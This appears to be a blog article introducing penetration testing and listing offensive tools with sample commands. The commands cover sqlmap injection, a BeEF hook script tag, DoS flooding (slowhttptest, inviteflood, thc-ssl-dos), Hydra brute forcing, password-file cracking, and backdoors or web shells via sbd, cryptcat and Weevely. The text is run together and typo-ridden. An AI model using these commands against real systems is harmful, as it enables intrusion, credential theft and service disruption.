While producing high-technology mobile apps and websites, there’s no way without security issues. That is why there are many top-notch pentest tools for handling multiple workflows that allow detection and elimination, as well as prevention of any web security attacks.What is Penetration Testing?The idea behind any penetration testing is to identify security-related vulnerabilities in a software application by conducting a security attack to determine how much damage a hacker may cause when trying to hack the product. The results of this practice help to make applications and software more secure, robust, and unbreakable, and the users’ experience – more successful.So, if you are going to develop and use any software for your business, the automated penetration testing method will help you to check network security threats.How Penetration Tests WorkPenetration testing is a simulated real-time cyber-attack conducted by certified security professionals (hackers) under secure conditions to detect gaps, glitches, vulnerabilities, loopholes, misconfigurations, etc. that are susceptible to further malicious code injections, malware, unauthorized entries, attacks, etc.Application testers then try and exploit these vulnerabilities, typically by stealing data, escalating privileges, intercepting traffic, etc., to understand the nature of damage they may cause. However, it’s hard to find all possible vulnerabilities using automated tools. There are some threats that can only be identified by manual system scans.To uncover the security vulnerabilities which can be found in any type or kind of Web Application, we may find three major tests types, which are as follows:Black Box Testing;White Box Testing;Gray Box Testing.Black box testing: A black box assessment is mostly performed without any knowledge of the system’s internals. Here testers check out the system solely from the outside. They have no idea of what is happening within the system to generate responses and test actions.White box testing: In a white box assessment, the testers have the fullest and most complete internal knowledge of the system that’s being tested (design docs, source code, etc.).Gray box testing: Gray box testing is another application security test technique that is a mix of both white box and black box testing.Best Penetration Testing01. Database Tools Usagesqlmapautomates the process of detectingand exploiting SQL injection flaws and taking over of database serverssqlmap –u victim_url
sqlmap --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686;rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' --level=5 risk=3 -p id --suffix="-BR" -v3
02. CMS Scanning ToolsWPScanwpscan --version
wpscan –u URL of webpage”.
Joomscanjoomscan –h
joomscan –-version
joomscan /?
joomscan –u victim_url
03. SSL Scanning ToolsTLSSLedtlssled URL port
w3afwww audi frameworkstartw3af
enter the URL of victimstart04. Metasploitmsfupdate
msf > search name:Microsoft type:exploit.
ArmitageMetaGUIBeEFbeef-xss
username and password: beef.<script src="http://192.168.1.101:3000/hook.js" type="text/javascript"></script>
Linux Exploit Suggesterroot@parrot:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0Forensics Toolsp0f identify the operating system of a target host simply by examining captured packetsIn the hands of advanced users, P0f can detect firewallpresence, NAT use, and existence of load balancers.p0f –-version
p0f -h
p0f –i eth0 –p -o filename
open 192.168.1.2pdf-parserparses a PDF document to identify the fundamental elements usedin the analyzed pdfpdf-parser -o 10 filepath
dumpzillaextract all forensicinteresting information of Firefox, Iceweasel, and Seamonkey browsersddrescuecopies data from one file or block device (hard disc, cdrom, etc.) to another, trying torescue the good parts first in case of read errors.dd_rescue infilepath outfilepath
dd_rescue -v /dev/sdb ~/sec.img
DFFdff-guiSocial EngineeringSocial Engineering Toolkitsudo apt install sendmail
vim config/set_config
# SENDMAIL=OFF flag to SENDMAIL=ON.
05. Stressing ToolsDoS attacks or to create the stress test for differentapplications so as take appropriate measures for the future.Slowhttptestslowhttptest --version
slowhttptest -h
# sampel
slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –u http://192.168.1.202/index.php -x 24 -p 2
Where,(-c 500) = 500 connections(-H) = Slowloris mode-g = Generate statistics-o outputfile = Output file name-i 10 = Use 10 seconds to wait for data-r 200 = 200 connections with -t GET = GET requests-u http://192.168.1.202/index.php = target URL-x 24 = maximum of length of 24 bytes-p 2 = 2-second timeoutInvitefloodSIP/SDP INVITE message flooding over UDP/IP.inviteflood --version
# format
inviteflood eth0 target_extension target_domain target_ip number_of_packets
# sample
inviteflood eth0 2000 192.168.x.x 192.168.x.x 1
Where,target_extension is 2000target_domain is 192.168.x.xtarget_ip is 192.168.x.xnumber_of_packets is 1-a is alias of SIP accountIaxfloodVoIP DoS tooliaxflood –-version
iaxflood –h
iaxflood sourcename destinationname numpackets
iaxflood ip_src ip_dest packets
thc-ssl-dosverify the performance of SSLEstablishing a secure SSL connection requires 15x more processing power on the server than on the client.# format
thc-ssl-dos victimIP httpsport –accept
# examp
thc-ssl-dos 192.168.1.1 443 –accept
06. Sniffing & SpoofingBurpsuitethe sniffing tool between your browser and the webservers to findthe parameters that the web application usesmitmproxySSL-capable man-in-the-middle HTTP proxy.mitmproxy –-version
mitmproxy –h
mitmproxy –p portnumber
mitmproxy –p 80
07.WiresharksslstripMITM attack that forces a victim's browser to communicate in plain-text over HTTPsslstrip --version
sslstrip -h
sslstrip -p 80
08. Password Cracking ToolsHydralogin cracker that supports many protocols to attackhydra -l /usr/share/wordlists/metasploit/user -P /usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 –V
JohnnyGUI for the John the Ripper password cracking toolJohnCLI for Johnny GUI.unshadow passwd shadow > unshadowed.txt
Rainbowcrack cracks hashes by rainbow table lookup.rcrack -h
rcrack path_to_rainbow_tables -f path_to_password_hash
rcrack path_to_rainbow_tables -f path_to_password_hash
./rcrack . -h 5d41402abc4b2a76b9719d911017c592
./rcrack . -l hash.txt
SQLdict09.dictionary attack tool for SQL serversqldict
Under “Target IP Server”,Under “Target Account”, enter the username.load the file with the passwordstarthash-identifieridentify types of hasheshash-identifier 5d41402abc4b2a76b9719d911017c592
10.Maintaining Accessuses to maintain connection and for access toa hacked machine even when it connects and disconnects again.Powersploithelp to connect with the victim’s machine via PowerShell.cd /usr/share/powersploit/
Sbdsimilar to Netcatfeatures AES-CBC-128 + HMAC-SHA1 encryption# server
sbd -l -p 44
# visctim
sbd 192.168.43.2 44
WeevelyPHP web shell that simulate telnet-like connectionused as a stealth backdoor# check
weevely -h
# format
weevely generate password pathoffile
# sample
weevely generate adm1n123 ~/Desktop/about1.php
# formart
weevely URL password
# sample
weevely http://198.168.32.13 adm1n123
http-tunnelcreates a bidirectional virtual data stream tunneled in HTTP requestsThis can be useful for users behind restrictive firewalls.# server
httptunnel_server –h
# client
httptunnel_client –h
cryptcatsimilar to Netcat which allows to make TCP and UDP connection with a victim’smachine in an encrypted way# server
cryptcat –l –p port –n
# client
cryptcat IPofServer PortofServer
11.Reverse EngineeringOllyDbg32-bit assembler level analyzing debugger for MS Windows applicationsused to crack the commercial softwares.startollydbg
dex2jarconvert APK file (android) to JAR file in order to view the source code.d2j-dex2jar –d /file location
d2j-dex2jar –d ~/Desktop/class.dex
jd-guistandalone graphical utility that displays Java source codes of “.class” files.jd-gui
apktoolbest tools to reverse the whole android applicationapktool
# decompile
apktool d apk file
12.Reporting ToolsDradisservice dradis start
dradis
open https://machine_ip:3004import files from NMAP, NESSUS, NEXPOSEMetagoofilsearch in Google to identify and download the documents to the localdisk and then extracts the metadata# help
metagoofil -h
metagoofil -d udsm -t docx -l 3 -o ~/Downloads -f ~/Downloads/metagoofil_res
–d (domain name)–t (filetype to download dox,pdf,etc)–l (limit the results 10, 100 )–n (limit files to download)–o ( location to save the files)–f (output file)Miscstrace# sample
strace –e trace=network,read,write /path/to/app args
# example
strace -e trace=network,read,write customapp
Read More